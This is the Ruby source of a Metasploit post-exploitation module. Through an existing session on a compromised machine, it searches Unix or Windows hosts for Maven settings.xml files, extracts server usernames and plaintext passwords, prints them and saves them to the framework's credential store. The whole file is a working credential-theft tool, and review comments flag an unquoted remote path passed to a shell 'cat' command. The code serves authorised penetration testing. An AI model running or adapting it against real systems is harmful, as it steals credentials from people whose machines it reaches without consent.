Path: blob/master/modules/post/multi/gather/maven_creds.rb
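##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'

# Post module that looks for Maven settings.xml files through an existing
# session, parses every <server> element and records the id, username and
# password it finds in the framework credential store.
#
# File paths and file contents both come from the remote host and are
# untrusted input to this module. The password element is stored exactly as it
# appears in the file; the module does not tell a plaintext value from any
# other form the file may hold.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Unix

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Multi Gather Maven Credentials Collection',
        'Description' => %q{
          This module will collect the contents of all users settings.xml on the targeted
          machine.
        },
        'License' => MSF_LICENSE,
        'Author' => ['elenoir'],
        'Platform' => %w[bsd linux osx unix win],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Compat' => {
          'Meterpreter' => {
            # core_channel_close is listed because extract closes the file
            # channel it opens.
            'Commands' => %w[
              core_channel_close
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
            ]
          }
        }
      )
    )
  end

  # Lists candidate settings.xml paths on a Unix-like session.
  #
  # @return [Array<String>, nil] candidate paths, or nil when the fallback
  #   finds no user directories
  def gathernix
    print_status('Unix OS detected')
    files = cmd_exec('locate settings.xml').split("\n")
    # Handle case where locate does not exist (error is returned in first element).
    # NOTE(review): a single genuine result also takes this branch, because a
    # settings.xml path is not a directory.
    if files.length == 1 && !directory?(files.first)
      files = []
      paths = enum_user_directories
      if paths.nil? || paths.empty?
        print_error('No users directory found')
        return
      end
      paths.each do |path|
        path.chomp!
        target = "#{path}/settings.xml"
        files.push(target) if file?(target)
      end
    end
    files
  end

  # Lists candidate settings.xml paths on a Windows session.
  #
  # @return [Array<String>] one entry per line of command output
  def gatherwin
    print_status('Windows OS detected')
    cmd_exec('cd\ && dir settings.xml /b /s').split("\n")
  end

  # Module entry point: picks the per-platform search and hands the result to
  # download_loot.
  #
  # @return [void]
  def run
    print_status('Finding user directories')
    files = nil
    case session.platform
    when 'windows'
      files = gatherwin
    when 'unix', 'linux', 'bsd', 'osx'
      files = gathernix
    else
      # Stop here so the unsupported-platform case is not also reported as
      # "No settings.xml file found".
      print_error('Incompatible platform')
      return
    end
    if files.nil? || files.empty?
      print_error('No settings.xml file found')
      return
    end
    download_loot(files)
  end

  # Reads and parses every listed path that exists as a file on the session.
  #
  # @param files [Array<String>] candidate paths; each entry is chomped in place
  # @return [void]
  def download_loot(files)
    print_status("Looting #{files.count} files")
    files.each do |target|
      target.chomp!
      next unless file?(target)

      print_status("Downloading #{target}")
      extract(target)
    end
  end

  # Parses one settings.xml document and stores a credential per <server>.
  #
  # The realm is the url of a <mirror> or, failing that, a <repository> whose
  # id matches the server id; when neither exists the id itself is used.
  #
  # @param target [String] path the data was read from, stored as the credential filename
  # @param data [String] raw XML text
  # @return [void]
  def parse_settings(target, data)
    xml_doc = Nokogiri::XML(data)
    xml_doc.remove_namespaces!

    xml_doc.xpath('//server').each do |server|
      id = server.xpath('id').text
      username = server.xpath('username').text
      password = server.xpath('password').text

      # The recovered values, password included, are echoed to the console.
      print_status('Collected the following credentials:')
      print_status(' Id: %s' % id)
      print_status(' Username: %s' % username)
      print_status(' Password: %s' % password)

      print_status('Try to find url from id...')
      realm = ''

      # The id comes from the parsed file, so it is bound as an XPath variable
      # instead of being interpolated: a quote inside it can then neither
      # break the expression nor alter the query.
      id_binding = { id: id }

      xml_doc.xpath('//mirror[id = $id]', nil, id_binding).each do |mirror|
        realm = mirror.xpath('url').text
        print_status("Found url in mirror : #{realm}")
      end

      if realm.blank?
        xml_doc.xpath('//repository[id = $id]', nil, id_binding).each do |repository|
          realm = repository.xpath('url').text
          print_status("Found url in repository : #{realm}")
        end
      end

      if realm.blank?
        print_status('No url found, id will be set as realm')
        realm = id
      end

      print_line('')

      credential_data = {
        origin_type: :import,
        module_fullname: fullname,
        filename: target,
        service_name: 'maven',
        realm_value: realm,
        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
        private_type: :password,
        private_data: password,
        username: username,
        workspace_id: myworkspace_id
      }
      create_credential(credential_data)
    end
  end

  # Reads one file through the session and passes its content to parse_settings.
  #
  # @param target [String] path of the file on the session host
  # @return [void]
  def extract(target)
    print_status("Reading settings.xml file from #{target}")
    data = ''
    if session.type == 'shell'
      # NOTE(review): target is interpolated into the command line unquoted,
      # and it originates from command output on the remote host.
      data = session.shell_command("cat #{target}")
    else
      settings = session.fs.file.new(target.to_s, 'rb')
      begin
        data << settings.read until settings.eof?
      ensure
        # Release the remote file channel even when a read fails.
        settings.close
      end
    end

    parse_settings(target, data)
  end
end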